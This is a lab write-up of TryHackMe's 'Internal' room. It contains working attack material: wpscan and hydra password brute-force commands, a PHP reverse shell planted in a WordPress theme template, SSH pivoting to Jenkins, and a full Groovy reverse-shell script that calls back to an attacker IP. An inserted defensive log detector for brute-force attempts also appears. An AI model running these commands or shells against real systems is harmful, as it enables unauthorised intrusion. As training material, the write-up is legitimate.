In this walkthrough we go through the Internal room from TryHackMe. The room is rated hard on the platform and simulates a standard pentesting engagement in which you assess a machine for a client. It covers enumeration, exploitation, pivoting and finally privilege escalation, validated by retrieving the user and root flags. On that note, let's get started.
Machine Info:

| Field | Value |
|---|---|
| Title | Internal |
| IP address | 10.10.150.195 |
| Difficulty | Hard |
| Objective | Having accepted the project, you are provided with the client assessment environment. Secure the User and Root flags and submit them to the dashboard as proof of exploitation. |
Task 1 – Pre-engagement Briefing
You have been assigned to a client that wants a penetration test conducted on an environment due to be released to production in three weeks.
Scope of Work
The client requests that an engineer conducts an external, web app, and internal assessment of the provided virtual environment. The client has asked that minimal information be provided about the assessment, wanting the engagement conducted from the eyes of a malicious actor (black box penetration test). The client has asked that you secure two flags (no location provided) as proof of exploitation:
- User.txt
- Root.txt
Additionally, the client has provided the following scope allowances:
- Ensure that you modify your hosts file to reflect internal.thm
- Any tools or techniques are permitted in this engagement
- Locate and note all vulnerabilities found
- Submit the flags discovered to the dashboard
- Only the IP address assigned to your machine is in scope
Phase 1 – Enumeration
- Checking whether the machine is live.
- Starting with a regular nmap scan. Found two open ports – 80 and 22 (HTTP and SSH).
```
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.150.195
[sudo] password for wh1terose:
Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-20 21:43 IST
Nmap scan report for 10.10.150.195
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.46 seconds
```
- Running Gobuster against port 80 reveals the directory – blog.
```
wh1terose@fsociety:~$ gobuster dir -u http://10.10.150.195/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.150.195/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/20 21:48:17 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/blog                 (Status: 301) [Size: 313] [--> http://10.10.150.195/blog/]
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 319] [--> http://10.10.150.195/javascript/]
/phpmyadmin           (Status: 301) [Size: 319] [--> http://10.10.150.195/phpmyadmin/]
/server-status        (Status: 403) [Size: 278]
/wordpress            (Status: 301) [Size: 318] [--> http://10.10.150.195/wordpress/]
===============================================================
2023/04/20 21:49:53 Finished
===============================================================
```
- Adding the IP to the local /etc/hosts file as internal.thm lets us access the WordPress blog by hostname.
[Image: /etc/hosts file]
- Navigate to – http://internal.thm/blog/
- It reveals that the site is running a WordPress blog. Next, I use wpscan to enumerate potential usernames and other low-hanging fruit. Found a username – admin.
```
wh1terose@fsociety:~$ wpscan --url http://internal.thm/blog/ -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.150.195]
[+] Started: Thu Apr 20 22:06:15 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://internal.thm/blog/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://internal.thm/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://internal.thm/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
 | Found By: Rss Generator (Passive Detection)
 |  - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
 |  - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://internal.thm/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://internal.thm/blog/wp-content/themes/twentyseventeen/readme.txt
 | [!] The version is out of date, the latest version is 3.2
 | Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Apr 20 22:06:21 2023
[+] Requests Done: 24
[+] Cached Requests: 37
[+] Data Sent: 6.616 KB
[+] Data Received: 128.629 KB
[+] Memory used: 177.352 MB
[+] Elapsed time: 00:00:06
```
- Next, use wpscan to brute-force the WordPress password over XML-RPC. Found the password to be – my2boys
```
wh1terose@fsociety:~$ wpscan --url http://internal.thm/blog/ --password-attack xmlrpc --max-threads 20 -P ~/Desktop/Wordlist/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://internal.thm/blog/ [10.10.150.195]
[+] Started: Thu Apr 20 22:10:25 2023

-- snipped --

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / my2boys
Trying admin / princess7 Time: 00:02:08 <=================                                > (3900 / 18900) 20.63%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

[+] Finished: Thu Apr 20 22:12:49 2023
[+] Requests Done: 4082
[+] Cached Requests: 18
[+] Data Sent: 2.054 MB
[+] Data Received: 2.659 MB
[+] Memory used: 296.156 MB
[+] Elapsed time: 00:02:24
```
- Logging into the WordPress admin dashboard by visiting – targetIp/blog/wp-admin
Phase 2 – Initial Access
- To get our first shell, I replaced the 404.php template in the Theme Editor with our good old PHP reverse shell.
- Didn't find any use for these credentials.
- I set up a netcat listener on port 1234 and triggered the PHP reverse shell with the following URL, which gave us our first shell on the machine.
- Navigate to – http://internal.thm/blog/index.php/2020/08/10/5/
Phase 3 – Escalating the user shell
- We got in as the regular web server user. We need to escalate our privileges to a user-level account to get the user flag. Roaming around the file system, I found wp-save.txt in the /opt directory, which contains the credentials of the user – aubreanna.
```
www-data@internal:/$ cd opt
cd opt
www-data@internal:/opt$ ls
ls
containerd  wp-save.txt
www-data@internal:/opt$ cat wp-save.txt
cat wp-save.txt
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.

aubreanna:bubb13guM!@#123
www-data@internal:/opt$ su aubreanna
su aubreanna
Password: bubb13guM!@#123

aubreanna@internal:/opt$
```
- Got the user flag.
- We got a hint that a Jenkins server is running on one of the internal machines.
Phase 4 – Accessing Internal Networks
- To reach the Jenkins server we need to port forward to it, since it is not reachable directly from our attacking machine. I use SSH local port forwarding to map a port on my local machine to the internal Jenkins server, authenticating the tunnel with the credentials of the aubreanna user.
```
wh1terose@fsociety:~/CTF/TryHackme/Internal$ ssh -L 6767:172.17.0.2:8080 aubreanna@internal.thm
The authenticity of host 'internal.thm (10.10.150.195)' can't be established.
ECDSA key fingerprint is SHA256:fJ/BlTrDF8wS8/eqyoej1aq/NmvQh79ABdkpiiN5tqE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'internal.thm' (ECDSA) to the list of known hosts.
aubreanna@internal.thm's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Apr 20 17:51:13 UTC 2023

  System load:  0.08              Processes:              123
  Usage of /:   63.8% of 8.79GB   Users logged in:        0
  Memory usage: 49%               IP address for eth0:    10.10.150.195
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug  3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$
```
- Accessing the Jenkins server at localhost on port 6767. Tried logging in with some default credentials such as admin:admin and admin:password, but no luck.
- Navigate to – http://localhost:6767
- We have to brute-force our way in. First, capture a login POST request in Burp Suite, which reveals the username and password parameter names needed for the brute-force attack.
```
POST /j_acegi_security_check HTTP/1.1
Host: localhost:6767
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
Origin: http://localhost:6767
DNT: 1
Connection: close
Referer: http://localhost:6767/loginError
Cookie: JSESSIONID.18b6903e=node01i3fc1q755dtt1qyao1hqrrwj22.node0
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Google Chrome";v="108", "Chromium";v="108", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0

j_username=admin&j_password=123&from=%2Fvar%2Flib%2Fjenkins%2Fsecrets%2FinitialAdminPassword&Submit=Sign+in
```
- Used hydra to brute-force the password for the username admin. Got the password – spongebob.
```
wh1terose@fsociety:~$ hydra -l admin -P ~/Desktop/Wordlist/rockyou.txt 127.0.0.1 -s6767 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password"
Hydra v9.5-dev (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-21 21:27:48
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 15000 login tries (l:1/p:15000), ~938 tries per task
[DATA] attacking http-post-form://127.0.0.1:6767/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[6767][http-post-form] host: 127.0.0.1   login: admin   password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-21 21:28:46
```
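Both password attacks in this write-up (the wpscan XML-RPC run against the blog and the hydra run against the Jenkins login) leave the same server-side footprint: one source POSTing to one login endpoint thousands of times within minutes. The detector below is an added example, not code from the original write-up; it scans Apache combined-format access logs for that pattern, assumes the blog paths from this room and that Jenkins sits behind a proxy logging in the same format, and runs on constructed sample lines.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined-log format; Jenkins is assumed to sit behind a proxy that logs the same way.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# Login endpoints a password attack hammers (paths assumed from this room's deployment).
WATCHED = {"/blog/xmlrpc.php", "/blog/wp-login.php", "/j_acegi_security_check"}

def parse(line):
    """Parse one log line into a dict, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "ts": datetime.strptime(m["ts"], TS_FMT),
            "method": m["method"], "path": m["path"].split("?", 1)[0],
            "status": int(m["status"])}

def find_bruteforce(lines, threshold=20, window=timedelta(seconds=60)):
    """Map (ip, path) -> total POST count for every source that POSTs to a watched
    endpoint more than `threshold` times inside any sliding `window`."""
    buckets = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev and ev["method"] == "POST" and ev["path"] in WATCHED:
            buckets[(ev["ip"], ev["path"])].append(ev["ts"])
    hits = {}
    for key, times in buckets.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:   # drop timestamps that fell out of the window
                start += 1
            if end - start + 1 > threshold:
                hits[key] = len(times)
                break
    return hits

def sample_log():
    """Constructed sample: 25 xmlrpc.php POSTs in 25 s from one (TEST-NET) source,
    mimicking the wpscan run above (~4000 requests in 2m24s), plus one normal page view."""
    base = datetime.strptime("20/Apr/2023:22:10:25 +0530", TS_FMT)
    lines = [f'198.51.100.7 - - [{(base + timedelta(seconds=i)).strftime(TS_FMT)}] '
             f'"POST /blog/xmlrpc.php HTTP/1.1" 200 370 "-" "WPScan v3.8.22"'
             for i in range(25)]
    lines.append(f'198.51.100.8 - - [{base.strftime(TS_FMT)}] "GET /blog/ HTTP/1.1" 200 10918 "-" "Mozilla/5.0"')
    return lines

if __name__ == "__main__":
    for (ip, path), n in find_bruteforce(sample_log()).items():
        print(f"ALERT {ip} -> {path}: {n} POSTs")
```

Requests that arrive through the SSH tunnel reach Jenkins from the host's docker0 address (172.17.0.1 here), not from the attacker, so a per-source threshold attributes the hydra run to the pivot host; correlating that alert with the aubreanna SSH session is what exposes the pivot.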
- Got into the Jenkins admin dashboard. Next, we have to figure out a way to upload and execute a reverse shell.
Phase 5 – Getting root access
- Next, to get shell access, go to Script Console under the Manage Jenkins section. The Jenkins script console executes Groovy scripts. I use the following reverse shell and catch the connection in my netcat listener.
- Navigate to – http://localhost:6767/script
```groovy
String host="10.18.11.103";
int port=4444;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();
```
- Roam around the /opt directory and you will find the root password in the note.txt file lying there.
- Got the credentials – username: root and password: tr0ub13guM!@#123
- Back in the SSH shell as user aubreanna, we used those credentials to root this machine and got our flag.
Task 2 – Deploy and Engage the Client Environment
Question 1 – User.txt Flag
THM{int3rna1_fl4g_1}
Question 2 – Root.txt Flag
THM{d0ck3r_d3str0y3r}
Conclusion:
So that was "Internal" for you. Let's sum it up quickly. We started off with a regular nmap scan and found ports 22 (SSH) and 80 (HTTP) open. The web server was running a WordPress blog. We used wpscan to enumerate usernames and later brute-forced our way into the WordPress dashboard. Next, we replaced the content of the 404.php file with our PHP reverse shell to get initial access. After getting access, we escalated to user aubreanna using the credentials found in wp-save.txt, which gave us the user flag. From there we had to pivot to another machine through the existing access and privileges; for this we used SSH tunnelling to port 8080, which was running a Jenkins server. Then we used hydra to get the password for the Jenkins dashboard login. Once inside, we used the Jenkins script console to execute a Groovy reverse shell, which led to the root shell and the root flag.